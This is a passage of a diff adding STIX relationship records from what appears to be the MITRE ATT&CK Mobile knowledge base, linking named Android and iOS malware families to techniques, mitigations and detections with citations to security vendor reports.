"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.237Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain the device’s battery level, network operator, connection information, sensor information, and information about the device’s storage and memory.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--83991b5c-59b9-4fe5-9ef2-39c6ddc8b835", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. 
Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "modified": "2019-10-15T19:54:10.285Z", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) gathered system information including phone number, OS version, phone model, and SDK version.(Citation: Kaspersky-WUC)", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5088a10e-03d2-4643-8df8-b7b601c2cc24", + "type": "relationship", + "created": "2020-01-27T17:05:58.267Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. 
Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.267Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can track the device’s location.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--07036963-6f5e-4eb5-9b20-3f81dd582c85", + "type": "relationship", + "created": "2020-11-20T16:37:28.547Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-11-20T16:37:28.547Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect various pieces of device information, such as serial number and product information.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4f6f4def-e76d-4d1b-9416-b6543e7dbc54", + "type": "relationship", + "created": "2021-10-01T14:42:48.744Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "modified": "2021-10-01T14:42:48.744Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can record audio.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8a55c28d-9cdd-4b6f-91e7-bcb3b05f6724", + "created": "2022-04-01T15:02:21.344Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation can often detect jailbroken devices. 
", + "modified": "2022-04-01T15:02:21.344Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f9de9819-b131-459e-948b-bdf3fe6f1ef0", + "type": "relationship", + "created": "2020-12-24T21:55:56.686Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T21:55:56.686Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has accessed common system information.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ff3aa49b-c054-44ec-89da-6c67d4995193", + "created": "2023-03-20T18:44:44.257Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:44.257Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--919a13bc-74be-4660-af63-454abee92635", + "type": "relationship", + "created": "2019-03-11T15:13:40.408Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Karl Dominguez. (2011, September 27). ANDROIDOS_ANSERVER.A. 
Retrieved November 30, 2018.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ANDROIDOS_ANSERVER.A", + "source_name": "TrendMicro-Anserver2" + } + ], + "modified": "2019-08-05T20:05:25.571Z", + "description": "\n[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) gathers the device IMEI and IMSI.(Citation: TrendMicro-Anserver2)", + "relationship_type": "uses", + "source_ref": "malware--4bf6ba32-4165-42c1-b911-9c36165891c8", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--83d95d05-7545-4295-894b-f33a2ba1063b", + "created": "2020-12-17T20:15:22.492Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. 
Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:47:45.408Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) has registered several broadcast receivers.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8c50e9e7-e13c-4814-98d0-088d73b10005", + "created": "2023-03-03T16:21:24.531Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. 
Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:21:24.531Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has modified Safari’s default search engine, bookmarked websites, opened pages, and accessed contacts and authorization tokens of the IM program “QQ” on infected devices.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f517a7ce-dfdc-4f42-84c1-fef136e2ea19", + "created": "2020-09-24T15:26:15.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. 
Retrieved July 20, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:41:01.468Z", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) has exfiltrated data using HTTP requests.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--26b1025b-5c08-4b6e-8c50-7d2baf29e7b7", + "created": "2022-04-01T18:45:11.299Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Recent versions of Android modified how device administrator applications are uninstalled, making it easier for the user to remove them.", + "modified": "2022-04-01T18:45:11.299Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--78cc0d6d-6347-45a4-a18c-ca76150aa7a9", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-BrainTest", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[BrainTest](https://attack.mitre.org/software/S0293) stores a secondary Android app package (APK) in its assets directory in encrypted form, and decrypts the payload at runtime.(Citation: Lookout-BrainTest)", + "relationship_type": "uses", + "source_ref": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c7f876d4-99f2-41ac-993c-57a3f2b4e0eb", + "created": "2023-02-06T19:00:42.449Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:22:43.518Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can access a device's location.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--020a1aaa-a444-4f3c-a08b-f1369be276f2", + "type": "relationship", + "created": "2020-09-15T15:18:12.398Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." 
+ } + ], + "modified": "2020-09-15T15:18:12.398Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect device networking information, including phone number, IMEI, and IMSI.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7ded1b79-cf7c-435d-b6ed-2c8872f9393f", + "type": "relationship", + "created": "2020-12-24T22:04:28.005Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T22:04:28.005Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has taken photos with the device camera.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--31330d32-50c8-4499-91fb-e1dcffa9ea8f", + "created": "2022-03-30T18:14:04.881Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Symantec-iOSProfile2", + "url": "https://www.symantec.com/connect/blogs/apple-ios-103-finally-battles-malicious-profiles", + "description": "Brian Duckering. (2017, March 27). Apple iOS 10.3 Finally Battles Malicious Profiles. Retrieved September 24, 2018." + }, + { + "source_name": "Android-TrustedCA", + "url": "https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html", + "description": "Chad Brubaker. (2016, July 7). Changes to Trusted Certificate Authorities in Android Nougat. Retrieved September 24, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile OSes have implemented measures to make it more difficult to trick users into installing untrusted certificates and configurations. iOS 10.3 and higher add an additional step for users to install new trusted CA certificates and configuration profiles. 
On Android, apps that target compatibility with Android 7 and higher (API Level 24) default to only trusting CA certificates that are bundled with the operating system, not CA certificates that are added by the user or administrator, hence decreasing their susceptibility to successful adversary-in-the-middle attack.(Citation: Symantec-iOSProfile2)(Citation: Android-TrustedCA)", + "modified": "2022-03-30T18:14:04.881Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ce5f506a-8fc9-40a2-a78e-96796c896f1b", + "created": "2023-03-20T15:56:47.307Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:56:47.307Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--40f30137-4db9-4596-b4c7-a12f1497fd92", + "created": "2020-11-10T17:08:35.831Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. 
Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has performed rudimentary SSL certificate validation to verify C2 server authenticity before establishing a SSL connection.(Citation: Lookout Uyghur Campaign)", + "modified": "2022-04-18T16:02:42.303Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--eb1eeb37-37a8-47b6-aff8-9703735a4d93", + "type": "relationship", + "created": "2020-09-11T15:50:18.937Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. 
Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "source_name": "ThreatFabric Ginp" + } + ], + "modified": "2020-09-11T15:50:18.937Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can send SMS messages.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--496976ef-4a0c-4782-95e7-231bd44df162", + "type": "relationship", + "created": "2020-12-14T15:02:35.295Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." 
+ } + ], + "modified": "2020-12-14T15:02:35.295Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) can collect various pieces of device information, including device model and OS version.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--85c7e956-3ce5-4495-b52e-385ae2ee4f9b", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. 
Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "modified": "2019-10-09T14:51:42.845Z", + "description": "[Charger](https://attack.mitre.org/software/S0323) checks the local settings of the device and does not run its malicious logic if the device is located in Ukraine, Russia, or Belarus.(Citation: CheckPoint-Charger)", + "relationship_type": "uses", + "source_ref": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ca8c38e6-8343-4f5e-929d-2759a0d49d59", + "created": "2020-11-24T18:18:33.743Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Exobot](https://attack.mitre.org/software/S0522) has used web injects to capture users’ credentials.(Citation: Threat Fabric Exobot)", + "modified": "2022-04-15T17:39:22.154Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8d71e646-74d1-4d62-8989-2ad4ddf7a67b", + "created": "2023-02-06T19:47:08.535Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. 
Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T15:13:44.210Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) has code to encrypt device data with AES.(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c90bfd4c-3c7e-4528-b5f6-574ef29ecdc9", + "created": "2022-03-28T19:32:05.234Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Application developers should be cautious when selecting third-party libraries to integrate into their application.", + "modified": "2022-03-28T19:32:05.234Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e9c5deb9-30d4-4bc3-98ca-6089d4b74b1e", + "type": "relationship", + "created": "2020-12-24T21:55:56.745Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": 
